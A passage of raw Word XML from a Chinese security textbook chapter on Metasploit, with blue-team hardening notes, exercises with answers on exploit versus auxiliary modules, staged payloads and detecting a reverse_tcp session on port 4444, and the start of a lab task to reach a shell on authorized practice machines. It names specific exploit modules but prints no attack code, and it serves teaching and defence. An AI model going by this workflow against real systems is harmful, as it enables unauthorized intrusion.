          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限直接决定了其后续攻击行为的范围。若被利用的服务进程以最低权限运行（非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root/Administrator），攻击者还需完成额外的提权步骤才能完全控制目标（相关技术见第15章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权与第16章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权）。蓝队应审计所有面向网络服务的运行权限：Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器、FTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器、数据库服务等均不应以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root/SYSTEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限运行；使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">细粒度授权替代直接</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录；对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">程序进行定期审计，移除不必要的特权位。这些措施属于预防性的深度防御，目的是增加攻击者在获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后继续推进攻击链的成本与复杂度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">注：关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Encoder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的用途说明（非武器化）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> encoder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">x86/shikata_ga_nai</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）在本书语境中被限定于其原始设计用途——即调整</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以适应特定传输约束（如避免坏字符（bad</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">character）导致的载荷损坏、满足特定协议对载荷格式的要求）。本书不教授</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> encoder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">用于反病毒软件（AV）或端点检测与响应系统（EDR）规避的武器化配置细节，此类内容已超越授权教学的伦理边界。蓝队在检测层面仅需理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> encoder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的基本概念即可用于规则设计，无需掌握其规避技巧。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题（提取题）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">17.2-1：模块类型辨析</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架中，exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> auxiliary </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块的核心区别是什么？在完整攻击链路中，二者通常在哪个阶段各自发挥主要作用？请各举一个具体模块名作为示例（可从本节内容中提取）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示：从“是否投递</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">payload”的角度思考；回忆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> db_nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> search </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">命令所在的操作阶段。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：exploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块负责利用特定漏洞向目标投递</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并建立会话，是攻击链路中“漏洞触发+载荷投递”阶段的核心组件（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。auxiliary</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块不投递</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload，主要用于侦察扫描、漏洞验证、拒绝服务测试等支持性功能，在攻击链路的“信息收集”阶段发挥作用（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary/scanner/portscan/tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。核心区别在于是否包含可配置的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接口并能建立会话。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">17.2-2：Staged</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> vs Stageless </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">载荷</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">简述</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> staged payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stageless payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在工作机制上的差异。在蓝队网络监控中，哪种</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的传输模式更容易被基于规则的特征检测所捕获？为什么？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示：思考两种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">在网络上传输的“体积”和“阶段数”差异；回想防御对照框中关于“已知载荷特征”的讨论。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：staged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload（分阶段载荷）将载荷分为两部分——小型的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">stage0（stager）优先传输并执行，随后由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stager </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主动向攻击机请求下载体积较大的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">stage1（完整功能载荷）；stageless</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">payload（无阶段载荷）则一次性传输完整载荷。在蓝队网络监控中，staged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">更容易被检测，因为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stager </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">向攻击机请求下载后续载荷的网络行为具有明显的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下载特征——一个极小的初始连接后紧跟着一个较大体积的数据传输，且该请求通常来自异常进程（被利用的服务进程派生子进程）。这一模式在流量审计和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则中易于捕获，而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> stageless payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的单次传输特征相对不易与正常数据传输区分。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">17.2-3：检测策略</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">假设你是一名蓝队分析师，在某内部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器的网络流量日志中观察到如下异常：22:15:03，该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器（192.168.1.10:41234）主动向外部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP 203.0.113.5:4444 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发起</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接，连接建立后双方进行了约</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分钟的低频小数据量通信。请结合本节防御对照框的内容，分析此行为为什么可疑，并列出你下一步的调查步骤（至少三步）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示：思考“服务器主动外连”这一行为的正常性；回忆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">通信模式检测的三个特征；调查步骤可从进程审计、NetFlow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">分析、内存取证等角度展开。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：此行为可疑的原因为：①正常情况下</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器作为服务端应被动接受外部请求，而非主动向外部非标准端口发起</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接（违反了服务器网络行为基线）；②10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分钟的低频小数据量通信符合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会话的“低慢”交互特征，与正常的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求-响应模型明显不符；③目标端口</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4444 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">载荷的常用默认端口。下一步调查步骤建议：①登录该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器进行进程审计，检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务进程（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">httpd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）是否存在异常子进程，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -anp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">确认建立该连接的进程</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与可执行文件路径；②提取该连接的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NetFlow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">记录和全包捕获（若有留存），分析载荷内容是否存在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit TLV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议特征；③对可疑进程进行内存</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">dump，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Volatility </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或类似工具分析内存中是否存在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Meterpreter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">相关特征码或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shellcode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">痕迹。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">任务描述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在另一台授权靶机（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TryHackMe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">平台上的“Metasploit:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction”房间或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTheBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的起始点靶机）上，独立完成从扫描到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> getshell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的完整</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链路。具体要求：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">①使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">db_nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary/scanner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模块完成服务识别；</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②根据识别结果搜索两个候选</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
